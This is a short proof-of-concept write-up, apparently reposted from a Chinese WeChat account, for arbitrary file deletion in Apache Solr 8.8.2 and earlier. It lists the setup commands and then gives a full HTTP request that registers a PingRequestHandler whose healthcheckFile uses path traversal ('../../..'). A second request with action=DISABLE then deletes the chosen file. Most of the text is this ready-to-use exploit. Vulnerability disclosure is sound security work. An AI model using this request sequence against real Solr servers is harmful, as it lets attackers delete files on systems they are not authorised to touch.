1.Download the latest version
https://apache.claz.org/lucene/solr/8.8.2/solr-8.8.2.tgz
2.Starting program
For convenience, I decided to use sample files for demonstration
solr.cmd -f -e dih
restart solr
solr.cmd -f -a "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=10010" -port 8983 -s "C:Solrsolr-8.8.0exampleexample-DIHsolr"
3.POC
step1:
Create a new file(aaa.txt) in the root directory(C:aaa.txt)
step2:
new a requesthandler
POST /solr/db/config HTTP/1.1Host: 192.168.33.130:8983User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-type:application/jsonConnection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Length: 218{"add-requesthandler": {"name": "/testping","class":"solr.PingRequestHandler","defaults":{"echoParams":"explicit"},"healthcheckFile":"../../../../../../../../../../../../../aaa.txt",}}
step3:
Check whether the creation is successful
http://192.168.33.130:8983/solr/db/config/overlay?omitHeader=true
step4:
visit url: http://192.168.33.130:8983/solr/db/testping?action=DISABLE
File deleted successfully
4.Source code in question
org.apache.solr.handler.PingRequestHandler
原文始发于微信公众号(赛博少女):Apache Solr<= 8.8.2 (最新) 任意文件删除
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论